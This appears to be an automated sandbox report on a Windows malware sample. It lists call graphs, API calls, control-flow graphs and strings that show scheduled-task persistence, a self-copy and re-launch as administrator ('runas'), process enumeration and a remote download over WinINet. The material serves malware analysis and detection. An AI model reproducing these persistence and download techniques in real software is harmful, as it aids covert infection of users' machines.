58 API calls 3 library calls 44384->44391 44387->44057 44388->44048 44389->44049 44390->44384 44392->44065 44393->44069 44394->44080 44395->44071 44396->44071 44397->44083 44399 43aeb8 EncodePointer 44398->44399 44399->44399 44400 43aed2 44399->44400 44400->44087 44401->44089 44403 40cf32 _memset __write_nolock 44402->44403 44404 40cf4f InternetOpenW 44403->44404 44405 415c10 59 API calls 44404->44405 44406 40cf8a InternetOpenUrlW 44405->44406 44407 40cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 44406->44407 44415 40cfb2 44406->44415 44727 4156d0 44407->44727 44409 40d000 44410 4156d0 59 API calls 44409->44410 44411 40d049 44410->44411 44411->44415 44746 413010 59 API calls 44411->44746 44413 40d084 44413->44415 44747 413010 59 API calls 44413->44747 44415->44093 44752 41ccc0 44416->44752 44772 41cc50 44419->44772 44422 41a04d 44422->44105 44422->44110 44425 413ab2 44424->44425 44432 413ad0 GetModuleFileNameW PathRemoveFileSpecW 44424->44432 44426 413b00 44425->44426 44427 413aba 44425->44427 44780 44f23e 59 API calls 2 library calls 44426->44780 44429 423b4c 59 API calls 44427->44429 44430 413ac7 44429->44430 44430->44432 44781 44f1bb 59 API calls 3 library calls 44430->44781 44434 418400 44432->44434 44435 418437 44434->44435 44439 418446 44434->44439 44435->44439 44782 415d50 59 API calls ___check_float_string 44435->44782 44437 4184b9 44437->44115 44439->44437 44783 418d50 59 API calls 44439->44783 44784 431781 44440->44784 44802 42f7c0 44443->44802 44446 411d20 _memset 44447 411d40 RegQueryValueExW RegCloseKey 44446->44447 44448 411d8f 44447->44448 44449 415c10 59 API calls 44448->44449 44450 411dbf 44449->44450 44451 411dd1 lstrlenA 44450->44451 44452 411e7c 44450->44452 44804 413520 59 API calls 44451->44804 44454 411e94 6 API calls 44452->44454 44456 411ef5 UuidCreate UuidToStringW 44454->44456 44455 411df1 44457 411e3c PathFileExistsW 44455->44457 44458 411e00 44455->44458 44459 411f36 44456->44459 44457->44452 44460 411e52 44457->44460 44458->44455 44458->44457 44462 415c10 59 API calls 44459->44462 44461 411e6a 44460->44461 44464 414690 59 API calls 44460->44464 44470 4121d1 44461->44470 44463 411f59 RpcStringFreeW PathAppendW CreateDirectoryW 44462->44463 44466 411fce 44463->44466 44468 411f98 44463->44468 44464->44461 44465 415c10 59 API calls 44465->44466 44467 415c10 59 API calls 44466->44467 44469 41201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 44467->44469 44468->44465 44469->44470 44471 41207c _memset 44469->44471 44470->44150 44472 412095 6 API calls 44471->44472 44473 412115 _memset 44472->44473 44474 412109 44472->44474 44476 412125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 44473->44476 44805 413260 59 API calls 44474->44805 44477 4121b2 44476->44477 44478 4121aa GetLastError 44476->44478 44479 4121c0 WaitForSingleObject 44477->44479 44478->44470 44479->44470 44479->44479 44481 42f7c0 __write_nolock 44480->44481 44482 41222d 7 API calls 44481->44482 44483 4122bd K32EnumProcesses 44482->44483 44484 41228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 44482->44484 44485 4122d3 44483->44485 44486 4122df 44483->44486 44484->44483 44485->44121 44487 412353 44486->44487 44488 4122f0 OpenProcess 44486->44488 44487->44121 44489 412346 CloseHandle 44488->44489 44490 41230a K32EnumProcessModules 44488->44490 44489->44487 44489->44488 44490->44489 44491 41231c K32GetModuleBaseNameW 44490->44491 44806 420235 44491->44806 44493 41233e 44493->44489 44494 412345 44493->44494 44494->44489 44496 420c62 _malloc 58 API calls 44495->44496 44499 40ef6e _memset 44496->44499 44497 40efdc 44497->44127 44498 420c62 _malloc 58 API calls 44498->44499 44499->44497 44499->44498 44499->44499 44501 413f05 44500->44501 44507 413eae 44500->44507 44502 413fb1 44501->44502 44503 413f18 44501->44503 44822 44f23e 59 API calls 2 library calls 44502->44822 44505 413fbb 44503->44505 44506 413f2d 44503->44506 44513 413f3d ___check_float_string 44503->44513 44823 44f23e 59 API calls 2 library calls 44505->44823 44506->44513 44821 416760 59 API calls 2 library calls 44506->44821 44507->44501 44511 413ed4 44507->44511 44514 413ed9 44511->44514 44515 413eef 44511->44515 44513->44127 44819 413da0 59 API calls ___check_float_string 44514->44819 44820 413da0 59 API calls ___check_float_string 44515->44820 44519 413ee9 44519->44127 44520 413eff 44520->44127 44522 4146a9 44521->44522 44523 41478c 44521->44523 44525 4146b6 44522->44525 44526 4146e9 44522->44526 44826 44f26c 59 API calls 3 library calls 44523->44826 44527 414796 44525->44527 44528 4146c2 44525->44528 44529 4147a0 44526->44529 44530 4146f5 44526->44530 44827 44f26c 59 API calls 3 library calls 44527->44827 44824 413340 59 API calls _memmove 44528->44824 44828 44f23e 59 API calls 2 library calls 44529->44828 44540 414707 ___check_float_string 44530->44540 44825 416950 59 API calls 2 library calls 44530->44825 44539 4146e0 44539->44143 44540->44143 44545 40d276 44544->44545 44546 40d27d CoInitializeSecurity 44544->44546 44545->44167 44547 414690 59 API calls 44546->44547 44548 40d2b8 CoCreateInstance 44547->44548 44549 40d2e3 VariantInit VariantInit VariantInit VariantInit 44548->44549 44550 40da3c CoUninitialize 44548->44550 44551 40d38e VariantClear VariantClear VariantClear VariantClear 44549->44551 44550->44545 44552 40d3e2 44551->44552 44553 40d3cc CoUninitialize 44551->44553 44829 40b140 44552->44829 44553->44545 44556 40d3f6 44834 40b1d0 44556->44834 44558 40d422 44559 40d426 CoUninitialize 44558->44559 44560 40d43c 44558->44560 44559->44545 44561 40b140 60 API calls 44560->44561 44563 40d449 44561->44563 44564 40b1d0 SysFreeString 44563->44564 44565 40d471 44564->44565 44566 40d496 CoUninitialize 44565->44566 44567 40d4ac 44565->44567 44566->44545 44569 40d8cf 44567->44569 44570 40b140 60 API calls 44567->44570 44569->44550 44571 40d4d5 44570->44571 44572 40b1d0 SysFreeString 44571->44572 44573 40d4fd 44572->44573 44573->44569 44574 40b140 60 API calls 44573->44574 44575 40d5ae 44574->44575 44576 40b1d0 SysFreeString 44575->44576 44577 40d5d6 44576->44577 44577->44569 44578 40b140 60 API calls 44577->44578 44579 40d679 44578->44579 44580 40b1d0 SysFreeString 44579->44580 44581 40d6a1 44580->44581 44581->44569 44582 40b140 60 API calls 44581->44582 44583 40d6b6 44582->44583 44584 40b1d0 SysFreeString 44583->44584 44585 40d6de 44584->44585 44585->44569 44586 40b140 60 API calls 44585->44586 44587 40d707 44586->44587 44588 40b1d0 SysFreeString 44587->44588 44589 40d72f 44588->44589 44589->44569 44590 40b140 60 API calls 44589->44590 44591 40d744 44590->44591 44592 40b1d0 SysFreeString 44591->44592 44593 40d76c 44592->44593 44593->44569 44838 423aaf GetSystemTimeAsFileTime 44593->44838 44595 40d77d 44840 423551 44595->44840 44600 412c40 59 API calls 44601 40d7b5 44600->44601 44602 412900 60 API calls 44601->44602 44603 40d7c3 44602->44603 44604 40b140 60 API calls 44603->44604 44605 40d7db 44604->44605 44606 40b1d0 SysFreeString 44605->44606 44607 40d7ff 44606->44607 44607->44569 44608 40b140 60 API calls 44607->44608 44609 40d8a3 44608->44609 44610 40b1d0 SysFreeString 44609->44610 44611 40d8cb 44610->44611 44611->44569 44612 40b140 60 API calls 44611->44612 44613 40d8ea 44612->44613 44614 40b1d0 SysFreeString 44613->44614 44615 40d912 44614->44615 44615->44569 44848 40b400 SysAllocString 44615->44848 44617 40d936 VariantInit VariantInit 44618 40b140 60 API calls 44617->44618 44619 40d985 44618->44619 44620 40b1d0 SysFreeString 44619->44620 44621 40d9e7 VariantClear VariantClear VariantClear 44620->44621 44622 40da10 44621->44622 44623 40da46 CoUninitialize 44621->44623 44852 42052a 78 API calls swprintf 44622->44852 44623->44545 44626->44099 44627->44141 44628->44142 44629->44181 44631 420cdd 44630->44631 44633 420c6e 44630->44633 45020 42793d DecodePointer 44631->45020 44641 420c79 44633->44641 44634 420ce3 45021 425208 58 API calls __getptd_noexit 44634->45021 44637 420ca1 HeapAlloc 44640 420cd5 44637->44640 44637->44641 44638 420ce9 44638->44171 44640->44638 44641->44633 44641->44637 44642 420cc9 44641->44642 44646 420cc7 44641->44646 45012 427f51 58 API calls 2 library calls 44641->45012 45013 427fae 58 API calls 8 library calls 44641->45013 45014 427b0b 44641->45014 45017 42793d DecodePointer 44641->45017 45018 425208 58 API calls __getptd_noexit 44642->45018 45019 425208 58 API calls __getptd_noexit 44646->45019 44648->44184 44650 415c66 44649->44650 44651 415c1e 44649->44651 44652 415c76 44650->44652 44653 415cff 44650->44653 44651->44650 44661 415c45 44651->44661 44659 415c88 ___check_float_string 44652->44659 45026 416950 59 API calls 2 library calls 44652->45026 45027 44f23e 59 API calls 2 library calls 44653->45027 44659->44188 44662 414690 59 API calls 44661->44662 44663 415c60 44662->44663 44663->44188 44664->44190 44665->44193 44666->44199 44667->44209 44669 413a90 59 API calls 44668->44669 44670 41294c MultiByteToWideChar 44669->44670 44671 418400 59 API calls 44670->44671 44672 41298d 44671->44672 44672->44212 44673->44217 44674->44225 44675->44231 44676->44235 44677->44239 44678->44243 44679->44247 44680->44251 44681->44255 44682->44257 44683->44259 44684->44261 44685->44263 44686->44265 44687->44267 44688->44269 44689->44271 44690->44273 44691->44275 44692->44277 44693->44279 44694->44281 44695->44283 44696->44285 44697->44287 44699 412c71 44698->44699 44700 412c5f 44698->44700 44703 4156d0 59 API calls 44699->44703 44701 4156d0 59 API calls 44700->44701 44702 412c6a 44701->44702 44702->44292 44704 412c8a 44703->44704 44704->44292 44705->44294 44706->44317 44707->44317 44708->44317 44709->44298 44710->44300 44711->44303 44712->44306 44713->44309 44714->44311 44715->44314 44716->44319 44717->44321 44718->44345 44719->44345 44720->44345 44721->44345 44722->44345 44723->44345 45028 41f130 218 API calls ___get_qualified_locale 44723->45028 44724->44325 45029 41fd80 64 API calls 44724->45029 44728 415735 44727->44728 44729 4156de 44727->44729 44730 4157bc 44728->44730 44731 41573e 44728->44731 44729->44728 44738 415704 44729->44738 44751 44f23e 59 API calls 2 library calls 44730->44751 44734 415750 ___check_float_string 44731->44734 44750 416760 59 API calls 2 library calls 44731->44750 44734->44409 44740 415709 44738->44740 44741 41571f 44738->44741 44748 413ff0 59 API calls ___check_float_string 44740->44748 44749 413ff0 59 API calls ___check_float_string 44741->44749 44744 415719 44744->44409 44745 41572f 44745->44409 44746->44413 44747->44415 44748->44744 44749->44745 44750->44734 44758 423b4c 44752->44758 44754 41ccca 44757 41a00a 44754->44757 44768 44f1bb 59 API calls 3 library calls 44754->44768 44757->44102 44757->44103 44760 423b54 44758->44760 44759 420c62 _malloc 58 API calls 44759->44760 44760->44759 44761 423b6e 44760->44761 44763 423b72 std::exception::exception 44760->44763 44769 42793d DecodePointer 44760->44769 44761->44754 44770 430eca RaiseException 44763->44770 44765 423b9c 44771 430d91 58 API calls _free 44765->44771 44767 423bae 44767->44754 44769->44760 44770->44765 44771->44767 44773 423b4c 59 API calls 44772->44773 44774 41cc5d 44773->44774 44775 41cc64 44774->44775 44779 44f1bb 59 API calls 3 library calls 44774->44779 44775->44422 44778 41d740 59 API calls 44775->44778 44778->44422 44782->44439 44783->44439 44787 431570 44784->44787 44788 431580 44787->44788 44789 431586 44788->44789 44794 4315ae 44788->44794 44798 425208 58 API calls __getptd_noexit 44789->44798 44791 43158b 44799 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44791->44799 44797 4315cf wcstoxq 44794->44797 44800 42e883 GetStringTypeW 44794->44800 44795 41a36e lstrcpyW lstrcpyW 44795->44136 44797->44795 44801 425208 58 API calls __getptd_noexit 44797->44801 44798->44791 44799->44795 44800->44794 44801->44795 44803 411cf2 RegOpenKeyExW 44802->44803 44803->44446 44803->44470 44804->44455 44805->44473 44807 420241 44806->44807 44808 4202b6 44806->44808 44815 420266 44807->44815 44816 425208 58 API calls __getptd_noexit 44807->44816 44818 4202c8 60 API calls 3 library calls 44808->44818 44811 4202c3 44811->44493 44812 42024d 44817 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44812->44817 44814 420258 44814->44493 44815->44493 44816->44812 44817->44814 44818->44811 44819->44519 44820->44520 44821->44513 44824->44539 44825->44540 44826->44527 44827->44529 44830 423b4c 59 API calls 44829->44830 44831 40b164 44830->44831 44832 40b177 SysAllocString 44831->44832 44833 40b194 44831->44833 44832->44833 44833->44556 44835 40b1de 44834->44835 44837 40b202 44834->44837 44836 40b1f5 SysFreeString 44835->44836 44835->44837 44836->44837 44837->44558 44839 423add __aulldiv 44838->44839 44839->44595 44853 43035d 44840->44853 44842 42355a 44844 40d78f 44842->44844 44861 423576 44842->44861 44845 4228e0 44844->44845 44965 42279f 44845->44965 44849 40b423 44848->44849 44850 40b41d 44848->44850 44851 40b42d VariantClear 44849->44851 44850->44617 44851->44617 44852->44569 44894 42501f 58 API calls 4 library calls 44853->44894 44855 430363 44856 430369 44855->44856 44857 43038d 44855->44857 44896 428cde 58 API calls 2 library calls 44855->44896 44856->44857 44895 425208 58 API calls __getptd_noexit 44856->44895 44857->44842 44860 43036e 44860->44842 44862 423591 44861->44862 44863 4235a9 _memset 44861->44863 44905 425208 58 API calls __getptd_noexit 44862->44905 44863->44862 44870 4235c0 44863->44870 44865 423596 44906 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44865->44906 44867 4235cb 44907 425208 58 API calls __getptd_noexit 44867->44907 44868 4235e9 44897 42fb64 44868->44897 44870->44867 44870->44868 44872 4235ee 44908 42f803 58 API calls _fgetws 44872->44908 44874 4235f7 44875 4237e5 44874->44875 44909 42f82d 58 API calls _fgetws 44874->44909 44922 4242fd 8 API calls 2 library calls 44875->44922 44878 4237ef 44879 423609 44879->44875 44910 42f857 44879->44910 44881 42361b 44881->44875 44882 423624 44881->44882 44883 42369b 44882->44883 44885 423637 44882->44885 44920 42f939 58 API calls 4 library calls 44883->44920 44917 42f939 58 API calls 4 library calls 44885->44917 44886 4236a2 44893 4235a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 44886->44893 44921 42fbb4 58 API calls 4 library calls 44886->44921 44888 42364f 44888->44893 44918 42fbb4 58 API calls 4 library calls 44888->44918 44891 423668 44891->44893 44919 42f939 58 API calls 4 library calls 44891->44919 44893->44844 44894->44855 44895->44860 44896->44856 44898 42fb70 _fgetws 44897->44898 44899 42fba5 _fgetws 44898->44899 44900 428af7 __lock 58 API calls 44898->44900 44899->44872 44901 42fb80 44900->44901 44904 42fb93 44901->44904 44923 42fe47 44901->44923 44952 42fbab LeaveCriticalSection _doexit 44904->44952 44905->44865 44906->44893 44907->44893 44908->44874 44909->44879 44911 42f861 44910->44911 44912 42f876 44910->44912 44963 425208 58 API calls __getptd_noexit 44911->44963 44912->44881 44914 42f866 44964 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44914->44964 44916 42f871 44916->44881 44917->44888 44918->44891 44919->44893 44920->44886 44921->44893 44922->44878 44924 42fe53 _fgetws 44923->44924 44925 428af7 __lock 58 API calls 44924->44925 44926 42fe71 _W_expandtime 44925->44926 44927 42f857 __tzset_nolock 58 API calls 44926->44927 44928 42fe86 44927->44928 44943 42ff25 __tzset_nolock __isindst_nolock 44928->44943 44953 42f803 58 API calls _fgetws 44928->44953 44931 42fe98 44931->44943 44954 42f82d 58 API calls _fgetws 44931->44954 44932 42ff71 GetTimeZoneInformation 44932->44943 44935 42feaa 44935->44943 44955 433f99 58 API calls 2 library calls 44935->44955 44937 42ffd8 WideCharToMultiByte 44937->44943 44938 42feb8 44956 441667 78 API calls 3 library calls 44938->44956 44939 430010 WideCharToMultiByte 44939->44943 44942 42ff0c _strlen 44958 428cde 58 API calls 2 library calls 44942->44958 44943->44932 44943->44937 44943->44939 44944 430157 __tzset_nolock _fgetws __isindst_nolock 44943->44944 44950 43ff8e 58 API calls ___getlocaleinfo 44943->44950 44951 423c2d 61 API calls UnDecorator::getTemplateConstant 44943->44951 44960 4242fd 8 API calls 2 library calls 44943->44960 44961 420bed 58 API calls 2 library calls 44943->44961 44962 4300d7 LeaveCriticalSection _doexit 44943->44962 44944->44904 44946 42fed9 ___TypeMatch 44946->44942 44946->44943 44957 420bed 58 API calls 2 library calls 44946->44957 44947 42ff1a _strlen 44947->44943 44959 42c0fd 58 API calls _fgetws 44947->44959 44950->44943 44951->44943 44952->44899 44953->44931 44954->44935 44955->44938 44956->44946 44957->44942 44958->44947 44959->44943 44960->44943 44961->44943 44962->44943 44963->44914 44964->44916 44992 42019c 44965->44992 44967 4227d4 45000 425208 58 API calls __getptd_noexit 44967->45000 44970 4227d9 45001 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44970->45001 44971 4227e9 MultiByteToWideChar 44974 422804 GetLastError 44971->44974 44975 422815 44971->44975 44973 40d7a3 44973->44600 45002 4251e7 58 API calls 3 library calls 44974->45002 45003 428cde 58 API calls 2 library calls 44975->45003 44978 42281d 44979 422810 44978->44979 44980 422825 MultiByteToWideChar 44978->44980 45007 420bed 58 API calls 2 library calls 44979->45007 44980->44974 44981 42283f 44980->44981 45004 428cde 58 API calls 2 library calls 44981->45004 44984 4228a0 45008 420bed 58 API calls 2 library calls 44984->45008 44986 42284a 44986->44979 45005 42d51e 88 API calls 3 library calls 44986->45005 44988 422866 44988->44979 44989 42286f WideCharToMultiByte 44988->44989 44989->44979 44990 42288b GetLastError 44989->44990 45006 4251e7 58 API calls 3 library calls 44990->45006 44993 4201ad 44992->44993 44997 4201fa 44992->44997 45009 425007 58 API calls 2 library calls 44993->45009 44995 4201b3 44996 4201da 44995->44996 45010 4245dc 58 API calls 6 library calls 44995->45010 44996->44997 45011 42495e 58 API calls 6 library calls 44996->45011 44997->44967 44997->44971 45000->44970 45001->44973 45002->44979 45003->44978 45004->44986 45005->44988 45006->44979 45007->44984 45008->44973 45009->44995 45010->44996 45011->44997 45012->44641 45013->44641 45022 427ad7 GetModuleHandleExW 45014->45022 45017->44641 45018->44646 45019->44640 45020->44634 45021->44638 45023 427af0 GetProcAddress 45022->45023 45024 427b07 ExitProcess 45022->45024 45023->45024 45025 427b02 45023->45025 45025->45024 45026->44659 45033 427e1a _fgetws 45032->45033 45034 428af7 __lock 51 API calls 45033->45034 45035 427e21 45034->45035 45036 427eda _doexit 45035->45036 45037 427e4f DecodePointer 45035->45037 45052 427f28 45036->45052 45037->45036 45039 427e66 DecodePointer 45037->45039 45046 427e76 45039->45046 45041 427f37 _fgetws 45041->44348 45043 427f1f 45045 427b0b _fast_error_exit 3 API calls 45043->45045 45044 427e83 EncodePointer 45044->45046 45048 427f28 45045->45048 45046->45036 45046->45044 45047 427e93 DecodePointer EncodePointer 45046->45047 45050 427ea5 DecodePointer DecodePointer 45047->45050 45049 427f35 45048->45049 45057 428c81 LeaveCriticalSection 45048->45057 45049->44348 45050->45046 45053 427f08 45052->45053 45054 427f2e 45052->45054 45053->45041 45056 428c81 LeaveCriticalSection 45053->45056 45058 428c81 LeaveCriticalSection 45054->45058 45056->45043 45057->45049 45058->45053
                APIs
                  • Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
                  • Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                  • Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                • GetCurrentProcess.KERNEL32 ref: 00419FC4
                • GetLastError.KERNEL32 ref: 00419FD2
                • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
                • GetLastError.KERNEL32 ref: 00419FE4
                • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,005CAE10,?), ref: 0041A0BB
                • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
                • GetCommandLineW.KERNEL32(?,?), ref: 0041A161
                  • Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                  • Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
                  • Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
                • API String ID: 2957410896-3144399390
                • Opcode ID: 9b5c50d6294a18cf099b6c7e176b95353e3768e69417b8150bb4c582a319d2e0
                • Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
                • Opcode Fuzzy Hash: 9b5c50d6294a18cf099b6c7e176b95353e3768e69417b8150bb4c582a319d2e0
                • Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 688 40d240-40d274 CoInitialize 689 40d276-40d278 688->689 690 40d27d-40d2dd CoInitializeSecurity call 414690 CoCreateInstance 688->690 691 40da8e-40da92 689->691 697 40d2e3-40d3ca VariantInit * 4 VariantClear * 4 690->697 698 40da3c-40da44 CoUninitialize 690->698 693 40da94-40da9c call 422587 691->693 694 40da9f-40dab1 691->694 693->694 704 40d3e2-40d3fe call 40b140 697->704 705 40d3cc-40d3dd CoUninitialize 697->705 700 40da69-40da6d 698->700 702 40da7a-40da8a 700->702 703 40da6f-40da77 call 422587 700->703 702->691 703->702 711 40d400-40d402 704->711 712 40d404 704->712 705->700 713 40d406-40d424 call 40b1d0 711->713 712->713 717 40d426-40d437 CoUninitialize 713->717 718 40d43c-40d451 call 40b140 713->718 717->700 722 40d453-40d455 718->722 723 40d457 718->723 724 40d459-40d494 call 40b1d0 722->724 723->724 730 40d496-40d4a7 CoUninitialize 724->730 731 40d4ac-40d4c2 724->731 730->700 734 40d4c8-40d4dd call 40b140 731->734 735 40da2a-40da37 731->735 739 40d4e3 734->739 740 40d4df-40d4e1 734->740 735->698 741 40d4e5-40d508 call 40b1d0 739->741 740->741 741->735 746 40d50e-40d524 741->746 746->735 748 40d52a-40d542 746->748 748->735 751 40d548-40d55e 748->751 751->735 753 40d564-40d57c 751->753 753->735 756 40d582-40d59b 753->756 756->735 758 40d5a1-40d5b6 call 40b140 756->758 761 40d5b8-40d5ba 758->761 762 40d5bc 758->762 763 40d5be-40d5e1 call 40b1d0 761->763 762->763 763->735 768 40d5e7-40d5fd 763->768 768->735 770 40d603-40d626 768->770 770->735 773 40d62c-40d651 770->773 773->735 776 40d657-40d666 773->776 776->735 778 40d66c-40d681 call 40b140 776->778 781 40d683-40d685 778->781 782 40d687 778->782 783 40d689-40d6a3 call 40b1d0 781->783 782->783 783->735 787 40d6a9-40d6be call 40b140 783->787 790 40d6c0-40d6c2 787->790 791 40d6c4 787->791 792 40d6c6-40d6e0 call 40b1d0 790->792 791->792 792->735 796 40d6e6-40d6f4 792->796 796->735 798 40d6fa-40d70f call 40b140 796->798 801 40d711-40d713 798->801 802 40d715 798->802 803 40d717-40d731 call 40b1d0 801->803 802->803 803->735 807 40d737-40d74c call 40b140 803->807 810 40d752 807->810 811 40d74e-40d750 807->811 812 40d754-40d76e call 40b1d0 810->812 811->812 812->735 816 40d774-40d7ce call 423aaf call 423551 call 4228e0 call 412c40 call 412900 812->816 827 40d7d0 816->827 828 40d7d2-40d7e3 call 40b140 816->828 827->828 831 40d7e5-40d7e7 828->831 832 40d7e9 828->832 833 40d7eb-40d819 call 40b1d0 call 413210 831->833 832->833 833->735 840 40d81f-40d835 833->840 840->735 842 40d83b-40d85e 840->842 842->735 845 40d864-40d889 842->845 845->735 848 40d88f-40d8ab call 40b140 845->848 851 40d8b1 848->851 852 40d8ad-40d8af 848->852 853 40d8b3-40d8cd call 40b1d0 851->853 852->853 857 40d8dd-40d8f2 call 40b140 853->857 858 40d8cf-40d8d8 853->858 862 40d8f4-40d8f6 857->862 863 40d8f8 857->863 858->735 864 40d8fa-40d91d call 40b1d0 862->864 863->864 864->735 869 40d923-40d98d call 40b400 VariantInit * 2 call 40b140 864->869 874 40d993 869->874 875 40d98f-40d991 869->875 876 40d995-40da0e call 40b1d0 VariantClear * 3 874->876 875->876 880 40da10-40da27 call 42052a 876->880 881 40da46-40da67 CoUninitialize 876->881 880->735 881->700
                APIs
                • CoInitialize.OLE32(00000000), ref: 0040D26C
                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
                • CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
                • VariantInit.OLEAUT32(?), ref: 0040D2F0
                • VariantInit.OLEAUT32(?), ref: 0040D309
                • VariantInit.OLEAUT32(?), ref: 0040D322
                • VariantInit.OLEAUT32(?), ref: 0040D33B
                • VariantClear.OLEAUT32(?), ref: 0040D397
                • VariantClear.OLEAUT32(?), ref: 0040D3A4
                • VariantClear.OLEAUT32(?), ref: 0040D3B1
                • VariantClear.OLEAUT32(?), ref: 0040D3C2
                • CoUninitialize.OLE32 ref: 0040D3D5
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                • API String ID: 2496729271-1738591096
                • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                • Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
                • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                • Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 903 40cf10-40cfb0 call 42f7c0 call 42b420 InternetOpenW call 415c10 InternetOpenUrlW 910 40cfb2-40cfb4 903->910 911 40cfb9-40cffb InternetReadFile InternetCloseHandle * 2 call 4156d0 903->911 912 40d213-40d217 910->912 916 40d000-40d01d 911->916 914 40d224-40d236 912->914 915 40d219-40d221 call 422587 912->915 915->914 918 40d023-40d02c 916->918 919 40d01f-40d021 916->919 922 40d030-40d035 918->922 921 40d039-40d069 call 4156d0 call 414300 919->921 928 40d1cb 921->928 929 40d06f-40d08b call 413010 921->929 922->922 923 40d037 922->923 923->921 931 40d1cd-40d1d1 928->931 935 40d0b9-40d0bd 929->935 936 40d08d-40d091 929->936 933 40d1d3-40d1db call 422587 931->933 934 40d1de-40d1f4 931->934 933->934 938 40d201-40d20f 934->938 939 40d1f6-40d1fe call 422587 934->939 943 40d0cd-40d0e1 call 414300 935->943 944 40d0bf-40d0ca call 422587 935->944 940 40d093-40d09b call 422587 936->940 941 40d09e-40d0b4 call 413d40 936->941 938->912 939->938 940->941 941->935 943->928 954 40d0e7-40d149 call 413010 943->954 944->943 957 40d150-40d15a 954->957 958 40d160-40d162 957->958 959 40d15c-40d15e 957->959 961 40d165-40d16a 958->961 960 40d16e-40d18b call 40b650 959->960 965 40d19a-40d19e 960->965 966 40d18d-40d18f 960->966 961->961 962 40d16c 961->962 962->960 965->957 967 40d1a0 965->967 966->965 968 40d191-40d198 966->968 969 40d1a2-40d1a6 967->969 968->965 970 40d1c7-40d1c9 968->970 971 40d1b3-40d1c5 969->971 972 40d1a8-40d1b0 call 422587 969->972 970->969 971->931 972->971
                APIs
                • _memset.LIBCMT ref: 0040CF4A
                • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
                • InternetCloseHandle.WININET(00000000), ref: 0040CFDA
                • InternetCloseHandle.WININET(00000000), ref: 0040CFDD
                Strings
